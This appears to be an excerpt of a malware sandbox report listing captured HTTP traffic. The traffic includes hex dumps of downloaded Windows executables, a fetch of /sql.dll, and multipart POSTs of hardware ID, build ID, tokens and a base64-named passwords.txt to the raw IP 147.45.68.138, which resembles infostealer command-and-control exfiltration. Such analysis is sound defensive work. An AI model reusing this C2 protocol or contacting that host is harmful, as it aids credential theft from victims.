00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:35 GMTContent-Type: application/octet-streamContent-Length: 328744Last-Modified: Thu, 29 Aug 2024 19:35:43 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d0cd8f-50428"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 cd d0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d2 04 00 00 0a 00 00 00 00 00 00 ae f1 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 fe 11 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 f1 04 00 53 00 00 00 00 00 05 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 de 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 20 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 d1 04 00 00 20 00 00 00 d2 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 00 05 00 00 08 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 f1 04 00 00 00 00 00 48 00 00 00 02 00 05 00 78 df 04 00 a8 10 00 00 03 00 02 00 0e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 8a 02 61 81 e9 db 99 1d 0e 63 3f cc 36 14 88 55 d0 9b 43 4d 66 27 08 3c a8 73 14 6f 6f 98 a0 3c 43 da b5 71 92 77 4e bc 65 c8 ce 69 ed ef 13 65 34 2b 84 99 cd d1 9d 8e 01 83 ff ce 16 1f 52 c6 9c dd 31 62 72 85 b0 bb 49 55 55 3c 12 4e 02 ea 19 7c 63 b1 56 47 48 ed ee e1 24 89 26 7e ac 2b a5 e4 c7 83 90 3c 33 38 f5 a4 b3 7f 74 52 5d 42 8c 7a de 34 2d 6f 43 ed 7b a7 82 18 ee e0 1b 7b 39 96 ad e7 78 30 77 ea 95 49 37 ca 5f a9 3b 21 27 71 ac d8 55 8b a8 ca 3f 82 60 bb ee 2f de 2b 2c 50 cf 82 4d 8f e5 bc 09 8c f1 1b 38 94 b6 7d fb 33 6a ca 9c 24 ce 59 3d 32 c8 dd a7 a7 29 b1 57 d1 5d 0f 74 2a 5a f1 bc 3e d2 ff 67 32 01 69 2d cf ba b6 0c f2 e1 87 49 0b eb 95 5b eb 8d 77 0b 05 1c b9 9d 75 c3 e1 d5 03 c9 c5 07 c9 fa ce 68 a4 8e 61 c5 33 d0 51 2a c4 ec 0c 98 79 d5 05 b1 c8 e9 e9 0e 3d 63 32 b0 84 6e ab 08 ef a4 99 05 8b c8 51 d5 4a 3e f8 aa 03 3d ce 8d 66 bd 18 77 1b e3 45 2d 60 fa 80 01 ce 2f aa 06 f
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:37 GMTContent-Type: application/octet-streamContent-Length: 196648Last-Modified: Thu, 29 Aug 2024 19:35:54 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d0cd9a-30028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee cc d0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ce 02 00 00 0a 00 00 00 00 00 00 ae ed 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 4e 2c 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ed 02 00 53 00 00 00 00 00 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 da 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 20 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 cd 02 00 00 20 00 00 00 ce 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 00 03 00 00 08 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ed 02 00 00 00 00 00 48 00 00 00 02 00 05 00 78 db 02 00 a8 10 00 00 03 00 02 00 0e 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 26 28 81 2c 58 16 1e 55 f4 66 8b 68 95 e3 26 5c f4 fa 06 3d 45 e8 fc c8 d8 f7 25 22 3d 6d 3f 2a 3c 16 1c bf 55 1d a6 48 66 c2 74 24 96 d1 9a c9 12 c7 13 55 21 ba 42 8b 23 9b 95 3a c7 10 64 b8 fc 45 91 96 0c 5c 17 8e 4a 31 be dc 39 09 0f ae e7 c1 19 df 4b e2 6c 58 d8 47 52 41 8a ec 36 7c 5e 8c 2e d7 6f 91 82 d0 a8 eb 40 c7 90 26 cb a6 ca 35 12 ce 94 8b 09 bd 0b cd c3 3a 95 e4 f9 01 69 20 bf 58 6d 9e 95 58 6a a6 97 ff 0d 5f 30 22 4c 8a 58 8f 45 4f 20 6a 05 83 25 af d4 b0 6d 6e 9a 45 63 54 25 d6 33 43 c8 29 29 cd fa 5e 06 3a a9 54 6e 37 c3 77 c9 0b 59 df c9 2e a7 60 5b 41 ca 74 79 e1 ba e9 0f 4e b5 a5 ed c7 bf 6a a3 18 b8 73 c2 7c 51 54 3f 86 39 c7 e7 27 fe 3a e4 9e 6c 93 24 c9 7b 26 56 dc e0 7d ad 39 98 03 6e 65 73 af c4 85 5b e7 d5 f2 3f fd 77 71 52 2f 5f 4a 55 81 38 bf 69 72 5f 52 a7 18 12 68 da f2 79 3c b3 3c 09 b9 40 2f 08 fa d3 cf ec 02 27 10 c0 e8 2d 55 a9 18 76 38 d5 46 b3 32 7a 11 c3 5

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHDHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 35 37 31 39 37 39 41 44 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 2d 2d 0d 0a Data Ascii: ------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GDAECAECFCAAEBFHIEHD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"1------GHJKJDAKEHJDGDGDGHID--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"2------DHIEBAAKJDHIECAAFHCA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="mode"21------ECAKKKKJDBKKFIEBKEHD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFHHost: 147.45.68.138Content-Length: 6325Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 147.45.68.138Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBFHost: 147.45.68.138Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 2d 2d 0d 0a Data Ascii: ------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; 